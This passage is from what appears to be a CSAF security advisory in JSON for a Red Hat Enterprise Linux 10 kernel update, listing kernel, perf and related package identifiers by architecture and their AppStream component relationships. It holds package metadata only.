"purl": "pkg:rpm/redhat/libperf@6.12.0-124.39.1.el10_1?arch=x86_64"
}
}
}
],
"category": "architecture",
"name": "x86_64"
},
{
"branches": [
{
"category": "product_version",
"name": "kernel-debug-devel-0:6.12.0-124.39.1.el10_1.s390x",
"product": {
"name": "kernel-debug-devel-0:6.12.0-124.39.1.el10_1.s390x",
"product_id": "kernel-debug-devel-0:6.12.0-124.39.1.el10_1.s390x",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-debug-devel@6.12.0-124.39.1.el10_1?arch=s390x"
}
}
},
{
"category": "product_version",
"name": "kernel-debug-devel-matched-0:6.12.0-124.39.1.el10_1.s390x",
"product": {
"name": "kernel-debug-devel-matched-0:6.12.0-124.39.1.el10_1.s390x",
"product_id": "kernel-debug-devel-matched-0:6.12.0-124.39.1.el10_1.s390x",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-debug-devel-matched@6.12.0-124.39.1.el10_1?arch=s390x"
}
}
},
{
"category": "product_version",
"name": "kernel-devel-0:6.12.0-124.39.1.el10_1.s390x",
"product": {
"name": "kernel-devel-0:6.12.0-124.39.1.el10_1.s390x",
"product_id": "kernel-devel-0:6.12.0-124.39.1.el10_1.s390x",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-devel@6.12.0-124.39.1.el10_1?arch=s390x"
}
}
},
{
"category": "product_version",
"name": "kernel-devel-matched-0:6.12.0-124.39.1.el10_1.s390x",
"product": {
"name": "kernel-devel-matched-0:6.12.0-124.39.1.el10_1.s390x",
"product_id": "kernel-devel-matched-0:6.12.0-124.39.1.el10_1.s390x",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-devel-matched@6.12.0-124.39.1.el10_1?arch=s390x"
}
}
},
{
"category": "product_version",
"name": "kernel-zfcpdump-devel-0:6.12.0-124.39.1.el10_1.s390x",
"product": {
"name": "kernel-zfcpdump-devel-0:6.12.0-124.39.1.el10_1.s390x",
"product_id": "kernel-zfcpdump-devel-0:6.12.0-124.39.1.el10_1.s390x",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-zfcpdump-devel@6.12.0-124.39.1.el10_1?arch=s390x"
}
}
},
{
"category": "product_version",
"name": "kernel-zfcpdump-devel-matched-0:6.12.0-124.39.1.el10_1.s390x",
"product": {
"name": "kernel-zfcpdump-devel-matched-0:6.12.0-124.39.1.el10_1.s390x",
"product_id": "kernel-zfcpdump-devel-matched-0:6.12.0-124.39.1.el10_1.s390x",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-zfcpdump-devel-matched@6.12.0-124.39.1.el10_1?arch=s390x"
}
}
},
{
"category": "product_version",
"name": "perf-0:6.12.0-124.39.1.el10_1.s390x",
"product": {
"name": "perf-0:6.12.0-124.39.1.el10_1.s390x",
"product_id": "perf-0:6.12.0-124.39.1.el10_1.s390x",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/perf@6.12.0-124.39.1.el10_1?arch=s390x"
}
}
},
{
"category": "product_version",
"name": "python3-perf-0:6.12.0-124.39.1.el10_1.s390x",
"product": {
"name": "python3-perf-0:6.12.0-124.39.1.el10_1.s390x",
"product_id": "python3-perf-0:6.12.0-124.39.1.el10_1.s390x",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/python3-perf@6.12.0-124.39.1.el10_1?arch=s390x"
}
}
},
{
"category": "product_version",
"name": "rtla-0:6.12.0-124.39.1.el10_1.s390x",
"product": {
"name": "rtla-0:6.12.0-124.39.1.el10_1.s390x",
"product_id": "rtla-0:6.12.0-124.39.1.el10_1.s390x",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/rtla@6.12.0-124.39.1.el10_1?arch=s390x"
}
}
},
{
"category": "product_version",
"name": "rv-0:6.12.0-124.39.1.el10_1.s390x",
"product": {
"name": "rv-0:6.12.0-124.39.1.el10_1.s390x",
"product_id": "rv-0:6.12.0-124.39.1.el10_1.s390x",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/rv@6.12.0-124.39.1.el10_1?arch=s390x"
}
}
},
{
"category": "product_version",
"name": "kernel-debug-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"product": {
"name": "kernel-debug-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"product_id": "kernel-debug-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-debug-debuginfo@6.12.0-124.39.1.el10_1?arch=s390x"
}
}
},
{
"category": "product_version",
"name": "kernel-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"product": {
"name": "kernel-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"product_id": "kernel-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-debuginfo@6.12.0-124.39.1.el10_1?arch=s390x"
}
}
},
{
"category": "product_version",
"name": "kernel-debuginfo-common-s390x-0:6.12.0-124.39.1.el10_1.s390x",
"product": {
"name": "kernel-debuginfo-common-s390x-0:6.12.0-124.39.1.el10_1.s390x",
"product_id": "kernel-debuginfo-common-s390x-0:6.12.0-124.39.1.el10_1.s390x",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-debuginfo-common-s390x@6.12.0-124.39.1.el10_1?arch=s390x"
}
}
},
{
"category": "product_version",
"name": "kernel-tools-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"product": {
"name": "kernel-tools-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"product_id": "kernel-tools-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-tools-debuginfo@6.12.0-124.39.1.el10_1?arch=s390x"
}
}
},
{
"category": "product_version",
"name": "kernel-zfcpdump-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"product": {
"name": "kernel-zfcpdump-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"product_id": "kernel-zfcpdump-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-zfcpdump-debuginfo@6.12.0-124.39.1.el10_1?arch=s390x"
}
}
},
{
"category": "product_version",
"name": "libperf-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"product": {
"name": "libperf-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"product_id": "libperf-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/libperf-debuginfo@6.12.0-124.39.1.el10_1?arch=s390x"
}
}
},
{
"category": "product_version",
"name": "perf-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"product": {
"name": "perf-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"product_id": "perf-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/perf-debuginfo@6.12.0-124.39.1.el10_1?arch=s390x"
}
}
},
{
"category": "product_version",
"name": "python3-perf-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"product": {
"name": "python3-perf-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"product_id": "python3-perf-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/python3-perf-debuginfo@6.12.0-124.39.1.el10_1?arch=s390x"
}
}
},
{
"category": "product_version",
"name": "kernel-0:6.12.0-124.39.1.el10_1.s390x",
"product": {
"name": "kernel-0:6.12.0-124.39.1.el10_1.s390x",
"product_id": "kernel-0:6.12.0-124.39.1.el10_1.s390x",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel@6.12.0-124.39.1.el10_1?arch=s390x"
}
}
},
{
"category": "product_version",
"name": "kernel-core-0:6.12.0-124.39.1.el10_1.s390x",
"product": {
"name": "kernel-core-0:6.12.0-124.39.1.el10_1.s390x",
"product_id": "kernel-core-0:6.12.0-124.39.1.el10_1.s390x",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-core@6.12.0-124.39.1.el10_1?arch=s390x"
}
}
},
{
"category": "product_version",
"name": "kernel-debug-0:6.12.0-124.39.1.el10_1.s390x",
"product": {
"name": "kernel-debug-0:6.12.0-124.39.1.el10_1.s390x",
"product_id": "kernel-debug-0:6.12.0-124.39.1.el10_1.s390x",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-debug@6.12.0-124.39.1.el10_1?arch=s390x"
}
}
},
{
"category": "product_version",
"name": "kernel-debug-core-0:6.12.0-124.39.1.el10_1.s390x",
"product": {
"name": "kernel-debug-core-0:6.12.0-124.39.1.el10_1.s390x",
"product_id": "kernel-debug-core-0:6.12.0-124.39.1.el10_1.s390x",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-debug-core@6.12.0-124.39.1.el10_1?arch=s390x"
}
}
},
{
"category": "product_version",
"name": "kernel-debug-modules-0:6.12.0-124.39.1.el10_1.s390x",
"product": {
"name": "kernel-debug-modules-0:6.12.0-124.39.1.el10_1.s390x",
"product_id": "kernel-debug-modules-0:6.12.0-124.39.1.el10_1.s390x",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-debug-modules@6.12.0-124.39.1.el10_1?arch=s390x"
}
}
},
{
"category": "product_version",
"name": "kernel-debug-modules-core-0:6.12.0-124.39.1.el10_1.s390x",
"product": {
"name": "kernel-debug-modules-core-0:6.12.0-124.39.1.el10_1.s390x",
"product_id": "kernel-debug-modules-core-0:6.12.0-124.39.1.el10_1.s390x",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-debug-modules-core@6.12.0-124.39.1.el10_1?arch=s390x"
}
}
},
{
"category": "product_version",
"name": "kernel-debug-modules-extra-0:6.12.0-124.39.1.el10_1.s390x",
"product": {
"name": "kernel-debug-modules-extra-0:6.12.0-124.39.1.el10_1.s390x",
"product_id": "kernel-debug-modules-extra-0:6.12.0-124.39.1.el10_1.s390x",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-debug-modules-extra@6.12.0-124.39.1.el10_1?arch=s390x"
}
}
},
{
"category": "product_version",
"name": "kernel-modules-0:6.12.0-124.39.1.el10_1.s390x",
"product": {
"name": "kernel-modules-0:6.12.0-124.39.1.el10_1.s390x",
"product_id": "kernel-modules-0:6.12.0-124.39.1.el10_1.s390x",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-modules@6.12.0-124.39.1.el10_1?arch=s390x"
}
}
},
{
"category": "product_version",
"name": "kernel-modules-core-0:6.12.0-124.39.1.el10_1.s390x",
"product": {
"name": "kernel-modules-core-0:6.12.0-124.39.1.el10_1.s390x",
"product_id": "kernel-modules-core-0:6.12.0-124.39.1.el10_1.s390x",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-modules-core@6.12.0-124.39.1.el10_1?arch=s390x"
}
}
},
{
"category": "product_version",
"name": "kernel-modules-extra-0:6.12.0-124.39.1.el10_1.s390x",
"product": {
"name": "kernel-modules-extra-0:6.12.0-124.39.1.el10_1.s390x",
"product_id": "kernel-modules-extra-0:6.12.0-124.39.1.el10_1.s390x",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-modules-extra@6.12.0-124.39.1.el10_1?arch=s390x"
}
}
},
{
"category": "product_version",
"name": "kernel-modules-extra-matched-0:6.12.0-124.39.1.el10_1.s390x",
"product": {
"name": "kernel-modules-extra-matched-0:6.12.0-124.39.1.el10_1.s390x",
"product_id": "kernel-modules-extra-matched-0:6.12.0-124.39.1.el10_1.s390x",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-modules-extra-matched@6.12.0-124.39.1.el10_1?arch=s390x"
}
}
},
{
"category": "product_version",
"name": "kernel-tools-0:6.12.0-124.39.1.el10_1.s390x",
"product": {
"name": "kernel-tools-0:6.12.0-124.39.1.el10_1.s390x",
"product_id": "kernel-tools-0:6.12.0-124.39.1.el10_1.s390x",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-tools@6.12.0-124.39.1.el10_1?arch=s390x"
}
}
},
{
"category": "product_version",
"name": "kernel-zfcpdump-0:6.12.0-124.39.1.el10_1.s390x",
"product": {
"name": "kernel-zfcpdump-0:6.12.0-124.39.1.el10_1.s390x",
"product_id": "kernel-zfcpdump-0:6.12.0-124.39.1.el10_1.s390x",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-zfcpdump@6.12.0-124.39.1.el10_1?arch=s390x"
}
}
},
{
"category": "product_version",
"name": "kernel-zfcpdump-core-0:6.12.0-124.39.1.el10_1.s390x",
"product": {
"name": "kernel-zfcpdump-core-0:6.12.0-124.39.1.el10_1.s390x",
"product_id": "kernel-zfcpdump-core-0:6.12.0-124.39.1.el10_1.s390x",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-zfcpdump-core@6.12.0-124.39.1.el10_1?arch=s390x"
}
}
},
{
"category": "product_version",
"name": "kernel-zfcpdump-modules-0:6.12.0-124.39.1.el10_1.s390x",
"product": {
"name": "kernel-zfcpdump-modules-0:6.12.0-124.39.1.el10_1.s390x",
"product_id": "kernel-zfcpdump-modules-0:6.12.0-124.39.1.el10_1.s390x",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-zfcpdump-modules@6.12.0-124.39.1.el10_1?arch=s390x"
}
}
},
{
"category": "product_version",
"name": "kernel-zfcpdump-modules-core-0:6.12.0-124.39.1.el10_1.s390x",
"product": {
"name": "kernel-zfcpdump-modules-core-0:6.12.0-124.39.1.el10_1.s390x",
"product_id": "kernel-zfcpdump-modules-core-0:6.12.0-124.39.1.el10_1.s390x",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-zfcpdump-modules-core@6.12.0-124.39.1.el10_1?arch=s390x"
}
}
},
{
"category": "product_version",
"name": "kernel-zfcpdump-modules-extra-0:6.12.0-124.39.1.el10_1.s390x",
"product": {
"name": "kernel-zfcpdump-modules-extra-0:6.12.0-124.39.1.el10_1.s390x",
"product_id": "kernel-zfcpdump-modules-extra-0:6.12.0-124.39.1.el10_1.s390x",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-zfcpdump-modules-extra@6.12.0-124.39.1.el10_1?arch=s390x"
}
}
},
{
"category": "product_version",
"name": "libperf-0:6.12.0-124.39.1.el10_1.s390x",
"product": {
"name": "libperf-0:6.12.0-124.39.1.el10_1.s390x",
"product_id": "libperf-0:6.12.0-124.39.1.el10_1.s390x",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/libperf@6.12.0-124.39.1.el10_1?arch=s390x"
}
}
}
],
"category": "architecture",
"name": "s390x"
},
{
"branches": [
{
"category": "product_version",
"name": "kernel-doc-0:6.12.0-124.39.1.el10_1.noarch",
"product": {
"name": "kernel-doc-0:6.12.0-124.39.1.el10_1.noarch",
"product_id": "kernel-doc-0:6.12.0-124.39.1.el10_1.noarch",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-doc@6.12.0-124.39.1.el10_1?arch=noarch"
}
}
},
{
"category": "product_version",
"name": "kernel-abi-stablelists-0:6.12.0-124.39.1.el10_1.noarch",
"product": {
"name": "kernel-abi-stablelists-0:6.12.0-124.39.1.el10_1.noarch",
"product_id": "kernel-abi-stablelists-0:6.12.0-124.39.1.el10_1.noarch",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-abi-stablelists@6.12.0-124.39.1.el10_1?arch=noarch"
}
}
}
],
"category": "architecture",
"name": "noarch"
},
{
"branches": [
{
"category": "product_version",
"name": "kernel-0:6.12.0-124.39.1.el10_1.src",
"product": {
"name": "kernel-0:6.12.0-124.39.1.el10_1.src",
"product_id": "kernel-0:6.12.0-124.39.1.el10_1.src",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel@6.12.0-124.39.1.el10_1?arch=src"
}
}
}
],
"category": "architecture",
"name": "src"
}
],
"category": "vendor",
"name": "Red Hat"
}
],
"relationships": [
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-0:6.12.0-124.39.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:kernel-0:6.12.0-124.39.1.el10_1.aarch64"
},
"product_reference": "kernel-0:6.12.0-124.39.1.el10_1.aarch64",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-0:6.12.0-124.39.1.el10_1.ppc64le as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:kernel-0:6.12.0-124.39.1.el10_1.ppc64le"
},
"product_reference": "kernel-0:6.12.0-124.39.1.el10_1.ppc64le",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-0:6.12.0-124.39.1.el10_1.s390x as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:kernel-0:6.12.0-124.39.1.el10_1.s390x"
},
"product_reference": "kernel-0:6.12.0-124.39.1.el10_1.s390x",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-0:6.12.0-124.39.1.el10_1.src as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:kernel-0:6.12.0-124.39.1.el10_1.src"
},
"product_reference": "kernel-0:6.12.0-124.39.1.el10_1.src",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-0:6.12.0-124.39.1.el10_1.x86_64 as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:kernel-0:6.12.0-124.39.1.el10_1.x86_64"
},
"product_reference": "kernel-0:6.12.0-124.39.1.el10_1.x86_64",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-64k-0:6.12.0-124.39.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:kernel-64k-0:6.12.0-124.39.1.el10_1.aarch64"
},
"product_reference": "kernel-64k-0:6.12.0-124.39.1.el10_1.aarch64",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-64k-core-0:6.12.0-124.39.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:kernel-64k-core-0:6.12.0-124.39.1.el10_1.aarch64"
},
"product_reference": "kernel-64k-core-0:6.12.0-124.39.1.el10_1.aarch64",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-64k-debug-0:6.12.0-124.39.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:kernel-64k-debug-0:6.12.0-124.39.1.el10_1.aarch64"
},
"product_reference": "kernel-64k-debug-0:6.12.0-124.39.1.el10_1.aarch64",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-64k-debug-core-0:6.12.0-124.39.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:kernel-64k-debug-core-0:6.12.0-124.39.1.el10_1.aarch64"
},
"product_reference": "kernel-64k-debug-core-0:6.12.0-124.39.1.el10_1.aarch64",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-64k-debug-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:kernel-64k-debug-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64"
},
"product_reference": "kernel-64k-debug-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-64k-debug-devel-0:6.12.0-124.39.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:kernel-64k-debug-devel-0:6.12.0-124.39.1.el10_1.aarch64"
},
"product_reference": "kernel-64k-debug-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-64k-debug-devel-matched-0:6.12.0-124.39.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:kernel-64k-debug-devel-matched-0:6.12.0-124.39.1.el10_1.aarch64"
},
"product_reference": "kernel-64k-debug-devel-matched-0:6.12.0-124.39.1.el10_1.aarch64",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-64k-debug-modules-0:6.12.0-124.39.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:kernel-64k-debug-modules-0:6.12.0-124.39.1.el10_1.aarch64"
},
"product_reference": "kernel-64k-debug-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-64k-debug-modules-core-0:6.12.0-124.39.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:kernel-64k-debug-modules-core-0:6.12.0-124.39.1.el10_1.aarch64"
},
"product_reference": "kernel-64k-debug-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-64k-debug-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:kernel-64k-debug-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64"
},
"product_reference": "kernel-64k-debug-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-64k-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:kernel-64k-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64"
},
"product_reference": "kernel-64k-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-64k-devel-0:6.12.0-124.39.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:kernel-64k-devel-0:6.12.0-124.39.1.el10_1.aarch64"
},
"product_reference": "kernel-64k-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-64k-devel-matched-0:6.12.0-124.39.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:kernel-64k-devel-matched-0:6.12.0-124.39.1.el10_1.aarch64"
},
"product_reference": "kernel-64k-devel-matched-0:6.12.0-124.39.1.el10_1.aarch64",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-64k-modules-0:6.12.0-124.39.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:kernel-64k-modules-0:6.12.0-124.39.1.el10_1.aarch64"
},
"product_reference": "kernel-64k-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-64k-modules-core-0:6.12.0-124.39.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:kernel-64k-modules-core-0:6.12.0-124.39.1.el10_1.aarch64"
},
"product_reference": "kernel-64k-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-64k-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:kernel-64k-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64"
},
"product_reference": "kernel-64k-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-abi-stablelists-0:6.12.0-124.39.1.el10_1.noarch as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:kernel-abi-stablelists-0:6.12.0-124.39.1.el10_1.noarch"
},
"product_reference": "kernel-abi-stablelists-0:6.12.0-124.39.1.el10_1.noarch",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-core-0:6.12.0-124.39.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:kernel-core-0:6.12.0-124.39.1.el10_1.aarch64"
},
"product_reference": "kernel-core-0:6.12.0-124.39.1.el10_1.aarch64",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-core-0:6.12.0-124.39.1.el10_1.ppc64le as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:kernel-core-0:6.12.0-124.39.1.el10_1.ppc64le"
},
"product_reference": "kernel-core-0:6.12.0-124.39.1.el10_1.ppc64le",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-core-0:6.12.0-124.39.1.el10_1.s390x as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:kernel-core-0:6.12.0-124.39.1.el10_1.s390x"
},
"product_reference": "kernel-core-0:6.12.0-124.39.1.el10_1.s390x",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-core-0:6.12.0-124.39.1.el10_1.x86_64 as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:kernel-core-0:6.12.0-124.39.1.el10_1.x86_64"
},
"product_reference": "kernel-core-0:6.12.0-124.39.1.el10_1.x86_64",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-0:6.12.0-124.39.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:kernel-debug-0:6.12.0-124.39.1.el10_1.aarch64"
},
"product_reference": "kernel-debug-0:6.12.0-124.39.1.el10_1.aarch64",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-0:6.12.0-124.39.1.el10_1.ppc64le as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:kernel-debug-0:6.12.0-124.39.1.el10_1.ppc64le"
},
"product_reference": "kernel-debug-0:6.12.0-124.39.1.el10_1.ppc64le",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-0:6.12.0-124.39.1.el10_1.s390x as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:kernel-debug-0:6.12.0-124.39.1.el10_1.s390x"
},
"product_reference": "kernel-debug-0:6.12.0-124.39.1.el10_1.s390x",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-0:6.12.0-124.39.1.el10_1.x86_64 as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:kernel-debug-0:6.12.0-124.39.1.el10_1.x86_64"
},
"product_reference": "kernel-debug-0:6.12.0-124.39.1.el10_1.x86_64",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-core-0:6.12.0-124.39.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:kernel-debug-core-0:6.12.0-124.39.1.el10_1.aarch64"
},
"product_reference": "kernel-debug-core-0:6.12.0-124.39.1.el10_1.aarch64",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-core-0:6.12.0-124.39.1.el10_1.ppc64le as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:kernel-debug-core-0:6.12.0-124.39.1.el10_1.ppc64le"
},
"product_reference": "kernel-debug-core-0:6.12.0-124.39.1.el10_1.ppc64le",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-core-0:6.12.0-124.39.1.el10_1.s390x as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:kernel-debug-core-0:6.12.0-124.39.1.el10_1.s390x"
},
"product_reference": "kernel-debug-core-0:6.12.0-124.39.1.el10_1.s390x",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
